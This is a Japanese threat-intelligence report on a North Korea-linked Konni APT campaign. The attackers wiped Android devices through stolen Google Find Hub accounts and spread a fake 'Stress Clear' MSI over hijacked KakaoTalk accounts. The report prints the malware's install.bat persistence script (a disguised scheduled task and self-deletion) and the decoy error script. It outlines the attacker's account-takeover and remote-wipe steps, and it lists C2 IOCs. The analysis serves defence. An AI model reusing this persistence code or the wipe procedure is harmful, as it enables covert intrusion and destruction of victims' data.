Genians Security Center(GSC)は、キムスキー(Kimsuky)またはAPT37グループと連携していることが知られているKonni(コニー) APTキャンペーンの新しい攻撃状況を確認しました。
GSCはコニー活動を追跡するプロセスで、韓国のカカオトーク(KakaoTalk)メッセンジャーを通じて「ストレス解消プログラム」に偽装したマルウェアが大量に拡散されているのを確認しました。
コニーは攻撃対象の分野や脅威インフラストラクチャがキムスキーまたはAPT37グループと重なることがあり、一部の研究者は同じ組織の活動に分類することもあります。これらのグループはすべて、北朝鮮政権の指令を受ける国家主導型のサイバー攻撃組織として知られています。
一方、2025年10月22日、 多国間制裁監視チーム(Multilateral Sanctions Monitoring Team, MSMT)の北朝鮮のサイバーとIT労働者活動に関する報告を発表し、共同声明書を採択しました。 MSMTは、国際連合安全保障理事会(UNSC)の決議に基づいて、制裁措置の違反および回避行為を監視し、それを国際社会に報告するために設立された多国間協議体です。
MSMT報告書には、北朝鮮のサイバー行為者およびIT労働者が国連制裁対象機関と結んでいる連携図が含まれており、63研究所(63 Research Center)を中心とした独立組織としてキムスキーとコニーグループが識別されています。
[図1-1] 63研究所に属しているキムスキーとコニーグループ(出典:MSMT)
最近確認されたコニーキャンペーンでは、韓国内のGoogle AndroidベースのスマートフォンやタブレットPCがリモートで初期化され、デバイスに保存された個人データが複数の事例から無断で削除される被害が発生した点が特に注目されます。
データ破壊攻撃に悪用されたGoogle Find Hubサービスは、盗難・紛失したAndroidデバイスを保護するために提供される機能です。しかし、国家の背後にある脅威アクターが窃取したGoogleアカウントを介してリモートコントロール権限を取得した後、デバイスの位置追跡とリモート初期化(Remote Wipe)を行った最初のケースが確認され、その機能はAPTキャンペーンで悪用される現実的なリスクがあると判明しました。
本報告書は、北朝鮮と連携したと推定される国家背後脅威組織がFind Hubアカウントを窃取して正常な管理機能を悪用、携帯機器をリモートで初期化した最初の攻撃戦術を究明することを目的としています。また、攻撃者が被害者のカカオトークPCセッションを悪用して、近い知人にマルウェアを頒布した連鎖攻撃シナリオを分析し、これに基づいて類似脅威に対する対応策とインテリジェンスインサイトを提供します。
GSCは昨年7月末、「Konni APTキャンペーンにおけるAutoItを用いた防衛回避戦術の分析」レポートを公開したことがあります。
当時分析された攻撃シナリオによると、脅威アクターは韓国の国税庁と脱北民学生奨学金申請書などの社会工学的テーマを活用して攻撃を設計・実行した事例が詳細に紹介されました。
攻撃によってインストールされた悪意のあるスクリプトは、ダメージシステムに密かに存在し、長期間潜伏し、この期間中にシステムの状態を監視し、持続性を確保するための内部変更を実行する可能性があります。また、多数のC&Cサーバと通信して追加の悪性モジュールをこっそり設置することで、脅威アクターがリアルタイムでシステム活動を遠隔監視・制御できる環境を構築します。
[図2-1]攻撃フロー
EDRなどの挙動ベースの挙動検知機能がない場合、脅威アクターは侵入した端末に長期間常駐し、利用者情報の窃取とウェブカメラによるプライバシー監視を行うことができます。
このプロセスで、初期侵入段階で得られたアクセス権を活用してシステム制御や追加情報収集が可能になり、検知回避戦略を通じて長期間潜伏することができます。
国家の背後にある脅威アクターは、ウェブカメラを悪用してユーザーの周囲を監視することができます。
特にウェブカメラにマイクが内臓されている場合、映像だけでなく音声まで収集可能で、プライバシー侵害範囲が大きく拡大されます。
また、動作インジケータ(LED)を持たないウェブカメラは、ビデオストリームの起動をユーザーが認識しにくく、検知がさらに困難になり、セキュリティリスクが高まります。
被害者のシステムがオンラインになっていて、ウェブカメラが有効になっている状況でユーザーが席を外した場合、脅威アクターはそれが存在しないかどうかを確認し、自由にリモート操作を実行できます。
また、窃取したGoogleアカウントの資格情報とFind Hub管理機能を活用して被害者のリアルタイム位置(GPS座標)を追跡し、リモート初期化を繰り返し実行してAndroidデバイスの個人データを削除することで正常な使用を妨げます。
これにより、被害者はモバイルデバイスで主要な連絡や通知メッセージを受信が困難になり、脅威アクターは長時間にわたって継続的な攻撃を実行する可能性があります。
セキュリティを強化するには、モーションインジケータを含むWebカメラを使用することをお勧めします。必要でない場合は、物理カバーでカメラレンズを遮断する必要があります。
さらに、ハードウェアレベルのマイク遮断機能を活用し、オペレーティングシステムやアプリケーションでカメラ・マイクアクセス権限を徹底的に管理することが必要です。
さらに、次のような後続のセキュリティ対策を検討・適用し、同様の脅威に備えられる政策を強化します。
脅威アクターは、国税庁などを詐称したスピアフィッシング攻撃を通じて特定の人物の端末に侵入した後、長期間内部偵察と情報収集を行いました。被害者の中には、脱北青少年が定着する中で経験する心理的困難を解消し、進路・進学・メンタリングなど多様なサービスを通じて情緒的な安定を支援する専門心理カウンセラーも含まれていました。
また別の被害事例では、国税庁を装ったメールを開き、添付のマルウェアを実行しました。しかし、直後に『間違いメールでした』というフォローアップの連絡を受けたため、大した問題ではないと判断し、そのまま放置してしまったケースもありました。
これらの事例は、スピアフィッシング攻撃が被害者を欺くためにいかに巧妙かつ大胆な手法を駆使しているかを示しており、格別な注意が必要であることを示唆しています。
[図 3-1] メール送信エラー通知を装った画面
さらに、国税庁を装って拡散された不正ファイルが、被害者のシステム上で実行された痕跡が多数確認されました。特に、「脱税に関する通報に伴う疎明資料提出依頼のご案内.zip」というファイルのダウンロード履歴をはじめとする様々なアーティファクトが識別され、これにより攻撃者の初期侵入プロセスを具体的に追跡することが可能となりました。
この報告書は、国税庁を装ったスピアフィッシング攻撃の被害に遭った一部の端末を詳細に調査し、デジタルフォレンジック分析を行った結果をまとめたものです。分析の結果、被害端末は単なる一次被害にとどまらず、攻撃インフラの一部として組み込まれていたことが判明しました。さらに、カカオトークを通じてマルウェアを二次拡散させる踏み台として悪用された事実も確認されています。
これは攻撃者が社会的信頼ベースのサービスを戦略的に活用して攻撃効果を最大化したことを示唆し、攻撃戦術の巧妙化および隠蔽手法の高度化を示す事例として評価できます。
[図3-2]カカオトークによる悪意のあるファイルの頒布例
調査の結果、9月5日午前、脅威アクターが韓国の脱北青少年専門心理カウンセラーのカカオトークアカウントを窃取・悪用し、実際の脱北民学生に「ストレス解消プログラム」で偽装したマルウェアを転送した事実が確認されました。受信者がそのファイルを実行すると、一部の端末で感染が発生し、その後の対応措置が実行されました。
その後わずか10日である9月15日、別の被害者のカカオトークアカウントを通じて悪意のあるファイルが同時多発的に大量頒布される事件が発生しました。
本攻撃は、信頼ベースのコミュニケーションを活用し、標的の心理・社会的文脈を精密に攻略した典型的な社会工学攻撃として評価されます。特に、メッセンジャープラットフォームアカウントの乗っ取りとそれを二次攻撃ベクトルとして悪用した点は、攻撃の精度を高めただけでなく、攻撃対象領域と伝播範囲を拡張し、脅威レベルを著しく上昇させました。
注目すべき点は、脅威アクターがFind Hub位置ベースの照会を通じて被害者が外部にいることを確認した直後に、被害者のAndroid端末(スマートフォン・タブレット)にリモート初期化コマンドを実行したことです。リモート初期化は端末の正常動作を停止させ、メッセンジャーアプリなどのプッシュ通知・メッセージ確認などアカウント所有者の認知経路を遮断し、検知と対応を遅延させました。その後、攻撃者は窃取したカカオトークアカウントを2次頒布チャネルで悪用し、リモート初期化直後に悪意のあるファイルを大量に拡散させることで、隠蔽と拡散を同時に達成しました。
このようにデバイスの無力化とアカウントベースの頒布を組み合わせた攻撃は、既存の国家背後のサイバー攻撃(APT)シナリオで前例がなく、本報告書を通じて最初に識別・分析された事例です。これは、攻撃の戦術的成熟度と検知回避戦略の高度化を実証するとともに、APT戦術進化の分岐点を示す重要な指標と判断されます。
初期侵入に成功した脅威アクターは、長期にわたって内部偵察と遠隔監視を行い、このプロセスで被害者の機密情報と主要アカウントの資格証明を収集・窃取し、GoogleおよびNaverアカウントのアクセス権を取得します。
取得した資格情報に基づいてアカウントに対する支配権を獲得した後、Find Hubの管理機能を悪用して携帯端末のリモート初期化など破壊的措置を実行することができます。デジタルフォレンジック分析とアーティファクト分析によって時系列(Timeline)に並べられた脅威アクターのいくつかのアクセスアドレスは、重複などを排除したときに次のようになります。
[図3-3]時間帯別リモート初期化ジョブの履歴
脅威アクターはまずGoogleのGmailにログインし、「アカウントアクティビティの詳細」ページで最近のログインセッション履歴を確認しました。
その後、「Googleアカウント管理」ページにアクセスして「セキュリティ」メニューを選択し、回復メールで登録されたNAVERアドレスを確認しました。その後、そのアカウントにログインしてGoogleから送信されたセキュリティ警告メールを削除し、ごみ箱の記録まですべて消去するなど、活動の痕跡を残さないように緻密で計画的に措置を講じました。
その後、Googleの「セキュリティ」メニューの「お使いのデバイス」項目の「紛失したデバイスを探す(Find My Phone)」リンクに移動しました。登録されたスマートフォンまたはタブレットを選択すると、「マイデバイス」サービスに接続し、登録されたスマートデバイスに対してさまざまなリモート操作ができます。
[図3-4] Find Hubに登録されたスマートフォンとタブレットデバイスの例
脅威アクターは、登録されたAndroidベースのスマートフォンとタブレットを対象にリモートワイプ行為を実行しました。このプロセスで、Googleパスワードをもう一度入力して初期化操作(Device Wipe Action)が正常に進行され、その機器に保存された主要データがすべて削除されるダメージが実際に発生しました。
[図3-5]デバイスのリモートワイプ行為を実行する様子
デバイスの初期化完了後も脅威アクターは同じリモート初期化コマンドを3回以上繰り返し送信し、対象スマート機器の正常な復旧および使用を長時間妨害・阻害することで可用性に影響を与えました。その時点で被害者のログインしていたカカオトークPC版を利用し、マルウェア頒布の媒介体として悪用しました。
[図3-6]デバイスの初期化とその後の攻撃の実行
本APT攻撃により、被害者は単なる情報漏洩を超えて、複数の端末機器にまたがる重大な被害を受けたことが確認された。
[動画3-1] 初期化の試演場面
カカオトークメッセージを介して配信された多数の「Stress Clear.zip」ファイルは、入手したすべてのサンプルで同じ構造を持つことが確認されました。圧縮ファイルの内部には、「Stress Clear.msi」という名前で偽装されたMicrosoft Installer(MSI)インストールパッケージが含まれています。
このMSIファイルには、中国の「Chengdu Hechenyingjia Mining Partnership Enterprise」名義の有効なデジタル署名が付与されています。これは、ファイルの出所や完全性の検証を通じて、あたかも正規ファイルであるかのように偽装する、コード署名の悪用戦術です。
[図4-1] 「Stress Clear.msi」内部構造の様子
「Stress Clear.msi」ファイルは、Windowsオペレーティングシステムベースの環境でのみ実行可能であり、スマートフォンなどの非互換プラットフォームでは実行できないため、感染対象から除外されます。もし、動作可能な環境でファイルを実行すると、標準のMSIインストールプロセスGUIが表示され、ユーザーが認識しない状態でインストールルーチン内の悪意のある行為が実行されます。
悪意のあるMSIが実行されると、パッケージ内に含まれているinstall.batバッチファイルとerror.vbsスクリプトがActionID値に基づいて順次呼び出されるように構成されています。
動作フローはおおよそ次のとおりです。参考までに、通常の金融セキュリティモジュールの一部が含まれていますが、実際の動作には影響しません。
実行時に画面に表示される各メッセージは次のように表示され、韓国語のストレスクリアプログラムのインストールガイドと言語パック互換の問題で偽装された偽のエラーメッセージです。
[図4-2]悪意のあるファイルの実行中に表示される画面
実行される各ファイルの具体的なコマンドと内容は次のとおりです。
| @echo off set dr=Music copy "%~dp0AutoIt3.exe" %public%\%dr%\AutoIt3.exe copy "%~dp0IoKlTr.au3" %public%\%dr%\IoKlTr.au3 cd /d %public%\%dr% & copy c:\windows\system32\schtasks.exe hwpviewer.exe & hwpviewer /delete /tn "IoKlTr" /f & hwpviewer /create /sc minute /mo 1 /tn "IoKlTr" /tr "%public%\%dr%\AutoIt3.exe %public%\%dr%\IoKlTr.au3" del /f /q "%~dp0AutoIt3.exe" del /f /q "%~dp0IoKlTr.au3" del /f /q "%~f0" |
[表4-1] install.bat スクリプトコマンド
BATファイルコマンドは、パブリックミュージックパス(%PUBLIC%\Music)に「AutoIt3.exe」と「IoKlTr.au3」スクリプトをコピーします。
次に、タスクスケジューラ設定ツール(Task Scheduler Configuration Tool)ソースの「schtasks.exe」ファイルを「hwpviewer.exe」という名前でコピーします。
スケジューラジョブを作成し(1分サイクル実行)、継続的に悪意のあるAutoItスクリプトを実行します。
その後、ソースバッチとソースファイルを削除して痕跡を最小限に抑えます。これは通常、マルウェアの永続性の確保及び証拠の隠蔽(自己削除、元の削除、ドキュメントビューアの偽装)を目的とした動作です。
| MsgBox "現在のシステム言語パックとプログラム言語パックで互換性がないため、実行できません。" &vbCrLf&_ "設定で韓国語(大韓民国)言語パックをインストールまたは変更した後、再度実行してください。", _ vbCritica, "言語パックエラー" |
[表4-2] error.vbsスクリプトコマンド
VBSファイルコマンドは、ユーザー画面に「言語パックエラー」というタイトルの警告ウィンドウ(メッセージボックス)を表示します。コード自体に悪意のある行為は含まれておらず、主に偽のエラーウィンドウを介してプログラムが正常に動作していないと認識するように促す偽装メッセージとして使用されます。
タスクスケジューラによって定期的に実行される「IoKlTr.au3」AutoItスクリプトは、システム内で継続的な悪意のある行為を実行するように設計されたコアコンポーネントです。
このスクリプトは一定の周期でロードされ、追加のコマンドを実行したり、悪意のあるペイロードを維持・更新する役割をします。
また、検知・分析を妨害するために、実際の実行フローとは無関係な不要なコードをスクリプトの前後に挿入して悪性ロジックを隠蔽します。
[図4-3]コンパイルされたオートイットスクリプトの内部コードの様子
内部コードを検討した結果、ターゲットファイルはコンパイルされたAutoItスクリプト構造を備えており、デコンパイルを通じて実際の命令を復元・確認することができます。これに関する詳細な分析については、前述の「AutoIt活用防御回避戦術のコニーAPTキャンペーン分析」レポートを参照してください。
ターゲットコードはAutoItベースのLilithRATといくつか似ていますが、変換された形式でendClient9688 JSONマーカーを使用し、コマンドと制御(C2)接続はドイツのクリエイティブドメインを介して行われます。このドメインはWordPressで構築されており、現在アクセス中にメンテナンスガイドが表示されます。そのため、EndRATに分類されることもあります。
過去、同様なキャンペーンでは、多数のC&CサーバがWordPressベースのホスティングを使用していることが観察され、脅威アクターはセキュリティの脆弱性が多いWordPress Webサーバを繰り返し悪用してC2インフラストラクチャを運営していると判断されます。
[図4-4]デコンパイルされたスクリプト
攻撃手法の一環として、重複実行防止のためのミューテックス(Mutex)とシステムの再起動時に自動実行されるように起動プログラムに登録されるショートカット(shortcut)形式の悪意のあるファイル(.lnk)が使用され、これらのファイルは一部変形して配布されます。
実際、過去のケースでは、対応するショートカットファイル名が「Start_Web.lnk」でしたが、今回のケースでは「Smart_Web.lnk」という名前に変更されました。
デジタルフォレンジック及び侵害対応(DFIR:Digital Forensics and Incident Response)プロセスにより、多くの追加証拠を確保しました。参考までに、DFIRプロセスは通常、次のように進められます。
2025年9月5日にカカオトークメッセンジャーを通じて頒布されたMSIファイルをダウンロードして実行した一部の被害者PCを対象にデジタルフォレンジック調査を行いました。
調査の結果、該当システムで多数の追加マルウェアが設置された状況が確認され、これに伴い関連資料に対する採証手続きを実施しました。
収集された証拠は、悪意のあるコードタイプの識別と侵害の範囲を特定するための詳細な分析に使用されました。
[図5-1]追加のマルウェア採証画面
被害者端末からC&Cサーバを介して追加ダウンロードされたと推定される多数の悪意のあるファイルが確認されました。
これらのファイルには、基本的に悪意のあるAutoItスクリプトと一緒にリモートコントロール(Remote Access)とキーロギング(Keylogging)機能を実行するモジュールが含まれていると分析されました。
脅威アクターは、さまざまなマルウェアをAutoItスクリプト内にエンコードまたは暗号化して隠蔽する手法を利用しており、これはセキュリティ製品の検知回避と悪意のある行為分析の遅延を導くための戦略と判断されます。
Genians Security Center(GSC)は、4月上旬に「韓国警察庁および国家人権委員会を装ったKonni APTキャンペーンの分析」報告書を詳細に公開した。
当時韓国警察庁捜査官を装って使用されたスピアフィッシング攻撃では 北朝鮮語の表現が多数識別されました。 例えば、「인차(インチャ)」は「すぐに」または「即時」を意味する表現であり、特定の行為が差し迫ったことを示すときに使用されます。また、「태공(テゴン)」は「태업(テイプ)=怠惰に働く」を意味する北朝鮮式の表現として確認されました。
脅威アクターは母国語の露出を最小限に抑えるために言語の使用に注意を払っていますが、通常の習慣的な表現が無意識に現れることがあります。これらの言語的特徴は、脅威アクターの国籍または活動地域を推定し、攻撃グループの帰属分析を実行するための重要な手がかりとして活用することができます。
警察庁の詐欺攻撃では、「マルウェア診断(マルウェアゼロ) - インストールファイル.msi」という名前のマルウェアが使用されました。このファイルは、「IoKlTr.au3」スクリプトをジョブスケジューラに登録して定期的に自動実行するように設定されていました。
一方、カカオトークメッセンジャーを介して攻撃された「Stress Clear.msi」ファイルでも同じ名前の「IoKlTr.au3」スクリプトが使用され、2つの攻撃間で同様の戦術と技法が活用された状況が確認されました。
さらに、各MSIファイルは一般的にEMCO SoftwareのMSI Package Builder(バージョン11.2.6および11.2.8)を使用して作成されました。
[図6-1] MSIパッケージファイルビルダーのバージョン比較
脅威アクターはAutoItスクリプトを使用してRemcosRAT(Remote Access Trojan)を実行するように構成されました。
参考までにRemcosRATは、2016年7月に1.0バージョンが最初に公開されて以来、継続的に更新されており、2025年9月現在のバージョンは7.0.4です。このマルウェアは商用バージョンで販売されており、脅威アクターが手軽に入手して攻撃に活用できます。
さらに、一部の被害者システムでは、RemcosRAT 7.0.4 Proバージョンが識別され、脅威アクターが最新バージョンのマルウェアと戦術を積極的に活用していることが確認されています。
[図6-2]オートイットスクリプト内部の文字列
収集されたAutoItスクリプト分析により、一部の内部フォルダ構造が識別され、攻撃インフラストラクチャと開発環境の追跡に重要な手がかりとして評価されます。
また、マルウェア製作に使用されたパス名に「攻撃ツール(Attack Weapon)」という表現が含まれている点は、脅威アクターの意図がサイバー攻撃武器および作戦計画であると推定できる根拠となります。
このフォルダ構造は、前述の「Konni APTキャンペーンにおけるAutoItを用いた防衛回避戦術の分析」レポートで説明されているパスと一致します。
ちなみに、2025年10月23日、国税庁の「届出外資金源に関する疎明資料提出の願い」として偽装して頒布されたマルウェアで、次のような経路が追加で識別されました。
被害者端末には、LilithRAT、RemcosRATに加えて、AutoItスクリプトに隠されて実行されるさまざまな亜種のRATモジュールが確認されました。代表的なタイプは次のとおりです。
これらのファイルはC2からダウンロードされ、「%APPDATA%\Google\Browser」ディレクトリのサブパスのうち「adb」または「adv」文字を含むフォルダに作成されます。受け取った 「autoit.vbs」 と 「install.bat」 スクリプトはそれぞれのフォルダの中で AutoIt ベースの実行を行います。
「sqlite3.au3」スクリプトには#AutoIt3Wrapper_Outfile_type=a3xディレクティブが含まれており、コンパイララッパーを介して構築された痕跡が確認されます。
そのスクリプトはHMAC構造ベースのハッシュ誘導プロセスを通じてAES復号化キーを生成し、それを使用してAESで暗号化されたペイロードを復号化します。
復号化されたモジュールはC#で書かれた「QuasarRAT」で、「hncfinder.exe」プロセスにインジェクションされ実行します。このプロセスで使用されたパスワード文字列は次のとおりです。
[図6-3] sqlite3.au3デコードプロセス
分析の結果、QuasarRATはオランダの212.118.52[.]168のC&Cサーバと通信し、その後のコマンドを受信するために継続的に接続を維持するように動作します。参考までに、Quasarプロジェクトは最初の展開時点でxRATという名前で公開されており、GitHubの記録では2015年8月頃のv1.0.0.0リリースで名前を「Quasar」に切り替えたことが確認されます。
[図6-4] QuasarRAT C&Cサーバアドレスの分析図
次に、「cliconfg.au3」スクリプトも#AutoIt3Wrapper_Outfile_type=a3xプロンプトが含まれます。
そのスクリプトも「sqlite3.au3」と同様にHMACベースのハッシュ誘導を経てAES復号化キーを生成し、このキーでAESで暗号化されたペイロードを復号化します。
復号化された実行モジュールはRFTServer(通称RftRAT)として分類され、「cleanmgr.exe」プロセスにインジェクションされ、実行されます。このプロセスで使用されるパスワード文字列は次のとおりです。
[図6-5] cliconfg.au3デコードプロセス
分析の結果、RftRATは日本の38.180.148[.]108のC&Cサーバと通信を試み、その後のコマンドを受信するために継続的に接続を維持するように動作します。
RtfRATは複雑な暗号化の代わりに単純な算術的な難読化手法(subtractive obfuscation)を使用しており、data文字列をキーとして利用し実際のC&Cサーバアドレスが公開されないように隠した形態です。
[図6-6] RftRAT C&Cサーバアドレス分析の様子
従来公開されているGeniansとAhnLabの分析資料によると、RftRATは韓国を対象とした持続的で秘密な脅威キャンペーンに活用されています。
RftRATは、グローバルの脅威分析レポートではあまり報告されていません。これは、このマルウェアが韓国地域に特化した攻撃ツールであることを示唆し、同時に関連データの確保と深い分析に多くの努力が必要であることを意味します。
被害者デバイスと類似悪意のあるコードから抽出された侵害指標を相互関連分析した結果、指標が単一コニーキャンペーンに収束する強い関連性が確認されました。
[図6-7]脅威インフラの相関図
脅威アクターはWordPressベースのホスティングを拠点インフラとして悪用し、ロシア・アメリカ・ドイツなどにホスティングされた1次C2ノードを活用したことが確認されました。
また、日本・オランダなど第3国サーバをRAT階層の中継ノードとして配置し、地理的分散と多段階中継を通じて捜査機関のログおよびソースIP追跡を回避・遅延させる戦術を使用しました。
悪意のあるMSIファイルが実行されると、パッケージ内に含まれているinstall.batバッチファイルが自動的に呼び出され、後続のコマンドが実行されます。 Genian EDR イベント分析の結果、このスクリプトはパブリックミュージックフォルダ(C:¥Users¥Public¥Music)パスにAutoIt3.exe実行可能ファイルとIoKlTr.au3スクリプトをコピーすることを確認しました。
これらの一連の動作は、EDRでプロセス生成(CreateProcess)、ファイル生成(FileCreate)、ファイルコピー(FileWrite)などのイベントとして収集され、これにより時系列ベースの挙動監視が可能になります。アナライザは、対応するイベントログを見て、MSIの実行時点からバッチファイルの実行、ファイルのコピーまで攻撃者の実行チェーン(Execution Chain)を確認することが可能です。
[写真7-1] Genian EDR脅威管理画面
MSI拡張子のマルウェアが実行されると、MsiExec.exeプロセスによって実行され、パッケージ内のファイルを生成し、install.batなどのバッチファイルを呼び出して悪意のあるスクリプトを実行することが観察できます。
この完全な実行フローは、EDRのコマンドライン(command line)イベントログを照会するとすばやく識別でき、セキュリティ管理者は脅威を早期に検知して対応できます。
[図7-2] MsiExec.exeコマンドラインの様子
AutoItプロセスの実行パスと動作フローを追跡すると、持続性を確保するためのSmart_Web.lnkショートカットの詳細(ターゲットパス)をすばやく確認できます。
さらに、プロセスログを使用して、サンプルが接続しているC2 IPとドメインを識別し、この情報を使用して内部情報漏洩をブロックするファイアウォールルール、EDRブロックルール、またはネットワークセグメンテーションポリシーをすばやく展開できます。
[図7-3] Genian EDR攻撃ストーリーライン
Genian EDRの攻撃ストーリーラインはマルウェアの全体実行フローを時系列・関係型で可視化し、SOC運営者がプロセスツリー・コマンドライン・ファイル・レジストリ・ネットワークイベントを一目で把握し、すぐに優先順位化・分離・遮断・フォレンジック収集など対応手続きを実行できるように支援します。
EDRはエンドポイントで発生するすべての挙動をリアルタイムで収集・分析し、悪性行為の全体の流れを可視化し、自動対応機能を通じて攻撃拡散を迅速に遮断することで、企業や機関がセキュリティ脅威に効果的に対応できるように支援します。
また、フォレンジック分析と脅威インテリジェンス連携を通じてセキュリティインシデントの原因究明、再発防止、内部情報漏洩の遮断など総合的なセキュリティ管理体系を構築できるようにし、高度化されたサイバー攻撃環境で既存のアンチウィルス・ファイアウォールだけでは検知されない脅威に対応するためにEDRの導入は必須です。
5ab26df9c161a6c5f0497fde381d7fca
8f82226b2f24d470c02f6664f67f23f7
09b91626507a62121a4bdb08debb3ed9
25e38d618f38b3218c3252cf0d22c969
38f8fd9e8d27ae665b3ac0f56492f6c4
048e1698c4b711d1652df4bf4be04f9e
53aea290d7245ee902a808fd87a6a173
56c7b448dbc37aa50eb1c2a6475aca5e
99ee7852b8041a540fdb74b3784d0409
8230af6642f5f1927bbbbc7fd6e5427f
b0eba111b570bb1c93ca1f48557d265b
ef1a8f66351d03413ed2c7d499ee5164
f7363c5cfd6fa24a86e542fcd05283e8
f6800836d55d049fe79e3d47d54e1119
appoitment.dotoit[.]media
genuinashop[.]com
oldfoxcompany[.]com
professionaltutors[.]net
sparkwebsolutions[.]space
xcellentrenovations[.]com
youkhanhdoit[.]co
116.202.99[.]218
192.109.119[.]113
212.118.52[.]168
38.180.148[.]108
62.113.118[.]157
77.246.101[.]72
77.246.108[.]96
89.110.83[.]245
91.107.208[.]93
93.183.93[.]185
94.103.87[.]212
109.234.36[.]135